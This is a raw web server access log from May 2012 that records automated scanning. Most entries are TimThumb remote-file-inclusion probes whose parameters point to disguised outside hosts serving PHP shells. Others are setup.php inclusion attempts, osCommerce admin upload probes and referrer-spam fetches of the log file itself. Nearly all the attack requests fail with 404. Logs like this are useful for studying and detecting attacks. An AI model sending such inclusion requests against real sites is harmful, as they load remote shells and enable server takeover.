112.95.252.106 - - [14/May/2012:03:39:09 +0200] "GET //wp-content/themes/magazinum/timthumb.php?src=http://picasa.com.sigeart.com/wp-content/images/soul.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
46.105.99.98 - - [14/May/2012:03:39:34 +0200] "GET /stats//wp-content/themes/comfy/thumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:03:39:34 +0200] "GET //wp-content/themes/comfy/thumb.php?src=http://blogger.com.ongcatavento.org/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
124.217.216.185 - - [14/May/2012:03:39:35 +0200] "GET /stats//wp-content/themes/Memoir/timthumb.php?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
124.217.216.185 - - [14/May/2012:03:39:36 +0200] "GET //wp-content/themes/Memoir/timthumb.php?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
188.138.91.140 - - [14/May/2012:03:40:05 +0200] "GET /stats/wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:40:06 +0200] "GET /wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:40:31 +0200] "GET /stats/wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:40:32 +0200] "GET /wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:41:03 +0200] "GET /stats/wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:41:04 +0200] "GET /wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.162.102.215 - - [14/May/2012:03:40:58 +0200] "POST /stats/log.keys.html/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 404 334 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
176.31.239.45 - - [14/May/2012:03:41:30 +0200] "GET //wp-content/themes/boldnews//timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:31 +0200] "GET //wp-content/themes/boldnews/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:31 +0200] "GET //wp-content/themes/boldnews/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:31 +0200] "GET //wp-content/themes/boldnews/options/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:31 +0200] "GET /stats//setup.php?dir=test?? HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:31 +0200] "GET //wp-content/themes/boldnews/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:32 +0200] "GET //wp-content/themes/boldnews/modules/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:32 +0200] "GET //wp-content/themes/boldnews/tools/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:32 +0200] "GET //wp-content/themes/boldnews/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:32 +0200] "GET //wp-content/themes/boldnews/js/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:32 +0200] "GET //wp-content/themes/boldnews/lib/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:32 +0200] "GET //wp-content/themes/boldnews/library/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:33 +0200] "GET //wp-content/themes/boldnews/tools/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:33 +0200] "GET //wp-content/themes/boldnews/tools/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:33 +0200] "GET /stats//setup.php?dir=http://novotempolivraria.com.br/loja/capek/idrfi.txt?? HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:33 +0200] "GET //wp-content/themes/boldnews/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:33 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:33 +0200] "GET /stats//setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/daster.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:33 +0200] "GET //wp-content/themes/boldnews/scripts/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 339 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:33 +0200] "GET //wp-content/themes/boldnews/library/functions/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:34 +0200] "GET //wp-content/themes/boldnews/library/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 339 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:34 +0200] "GET //wp-content/themes/boldnews/library/resource/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 339 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:34 +0200] "GET //wp-content/themes/boldnews/library/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:34 +0200] "GET //wp-content/themes/boldnews/lib/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:34 +0200] "GET //wp-content/themes/boldnews/lib/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:35 +0200] "GET //wp-content/themes/boldnews/lib/script/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:35 +0200] "GET //wp-content/themes/boldnews/lib/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:35 +0200] "GET /stats//setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/j2.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:35 +0200] "GET //wp-content/themes/boldnews/layouts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:35 +0200] "GET //wp-content/themes/boldnews/includes/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:35 +0200] "GET //wp-content/themes/boldnews/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:35 +0200] "GET //wp-content/themes/boldnews/framework/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 341 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
78.137.37.171 - - [14/May/2012:03:41:35 +0200] "GET /logs/access_log HTTP/1.0" 200 408452 "http://playbandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
176.31.239.45 - - [14/May/2012:03:41:36 +0200] "GET //wp-content/themes/boldnews/framework/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 338 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:36 +0200] "GET //wp-content/themes/boldnews/functions/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
78.137.37.171 - - [14/May/2012:03:41:36 +0200] "GET /logs/access_log HTTP/1.0" 200 410169 "http://playbandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
176.31.239.45 - - [14/May/2012:03:41:36 +0200] "GET //wp-content/themes/boldnews/functions/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 341 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:36 +0200] "GET //wp-content/themes/boldnews/images/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
78.137.37.171 - - [14/May/2012:03:41:36 +0200] "GET /logs/access_log HTTP/1.0" 200 411200 "http://playbandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
176.31.239.45 - - [14/May/2012:03:41:36 +0200] "GET //wp-content/themes/boldnews/inc/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:36 +0200] "GET //setup.php?dir=test?? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:36 +0200] "GET //wp-content/themes/boldnews/includes/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:37 +0200] "GET //wp-content/themes/boldnews//thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 320 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
78.137.37.171 - - [14/May/2012:03:41:36 +0200] "GET /logs/access_log HTTP/1.0" 200 412385 "http://playbandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
176.31.239.45 - - [14/May/2012:03:41:37 +0200] "GET //wp-content/themes/boldnews/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 328 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:37 +0200] "GET //wp-content/themes/boldnews/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
78.137.37.171 - - [14/May/2012:03:41:37 +0200] "GET /logs/access_log HTTP/1.0" 200 413053 "http://playbandroid.info/sitemap252.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
176.31.239.45 - - [14/May/2012:03:41:37 +0200] "GET //wp-content/themes/boldnews/options/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:37 +0200] "GET //wp-content/themes/boldnews/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:38 +0200] "GET //wp-content/themes/boldnews/modules/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:38 +0200] "GET //setup.php?dir=http://novotempolivraria.com.br/loja/capek/idrfi.txt?? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:38 +0200] "GET //wp-content/themes/boldnews/tools/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:38 +0200] "GET //wp-content/themes/boldnews/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:38 +0200] "GET //wp-content/themes/boldnews/js/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:38 +0200] "GET //setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/daster.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:38 +0200] "GET //wp-content/themes/boldnews/lib/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:39 +0200] "GET //wp-content/themes/boldnews/library/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
95.132.213.162 - - [14/May/2012:03:41:39 +0200] "GET /logs/access_log HTTP/1.0" 200 415915 "http://androidenplay.info/sitemap70.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
176.31.239.45 - - [14/May/2012:03:41:39 +0200] "GET //wp-content/themes/boldnews/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:39 +0200] "GET //wp-content/themes/boldnews/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:39 +0200] "GET //wp-content/themes/boldnews/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:39 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:40 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
202.150.216.211 - - [14/May/2012:03:41:40 +0200] "GET //setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/j2.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:40 +0200] "GET //wp-content/themes/boldnews/library/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:40 +0200] "GET //wp-content/themes/boldnews/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
95.132.213.162 - - [14/May/2012:03:41:40 +0200] "GET /logs/access_log HTTP/1.0" 200 417151 "http://androidenplay.info/sitemap70.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
176.31.239.45 - - [14/May/2012:03:41:40 +0200] "GET //wp-content/themes/boldnews/library/resource/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:40 +0200] "GET //wp-content/themes/boldnews/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:41 +0200] "GET //wp-content/themes/boldnews/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:41 +0200] "GET //wp-content/themes/boldnews/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:41 +0200] "GET //wp-content/themes/boldnews/lib/script/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
95.132.213.162 - - [14/May/2012:03:41:40 +0200] "GET /logs/access_log HTTP/1.0" 200 418654 "http://androidenplay.info/sitemap70.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]"
176.31.239.45 - - [14/May/2012:03:41:41 +0200] "GET //wp-content/themes/boldnews/lib/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:41 +0200] "GET //wp-content/themes/boldnews/layouts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:41 +0200] "GET //wp-content/themes/boldnews/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:42 +0200] "GET //wp-content/themes/boldnews/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:42 +0200] "GET //wp-content/themes/boldnews/framework/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 338 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:42 +0200] "GET //wp-content/themes/boldnews/framework/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:42 +0200] "GET //wp-content/themes/boldnews/functions/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:42 +0200] "GET //wp-content/themes/boldnews/functions/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 335 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:42 +0200] "GET //wp-content/themes/boldnews/images/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
176.31.239.45 - - [14/May/2012:03:41:43 +0200] "GET //wp-content/themes/boldnews/inc/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
95.132.213.162 - - [14/May/2012:03:41:42 +0200] "GET /logs/access_log HTTP/1.0" 200 421592 "http://androidenplay.info/sitemap70.html" "Mozilla/0.6 Beta (Windows)"
176.31.239.45 - - [14/May/2012:03:41:43 +0200] "GET //wp-content/themes/boldnews/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
95.132.213.162 - - [14/May/2012:03:41:46 +0200] "GET /logs/access_log HTTP/1.0" 200 422741 "http://androidenplay.info/sitemap70.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)"
188.138.91.140 - - [14/May/2012:03:41:59 +0200] "GET /stats/wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:42:00 +0200] "GET /wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.162.102.215 - - [14/May/2012:03:41:22 +0200] "POST /stats/log.keys.html/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 332 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
184.173.6.208 - - [14/May/2012:03:42:12 +0200] "GET /stats//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:03:42:13 +0200] "GET //wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
188.138.91.140 - - [14/May/2012:03:42:15 +0200] "GET /stats/wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.138.91.140 - - [14/May/2012:03:42:16 +0200] "GET /wp-content/themes/InStyle/thumbopen.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:03:42:38 +0200] "GET /stats//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
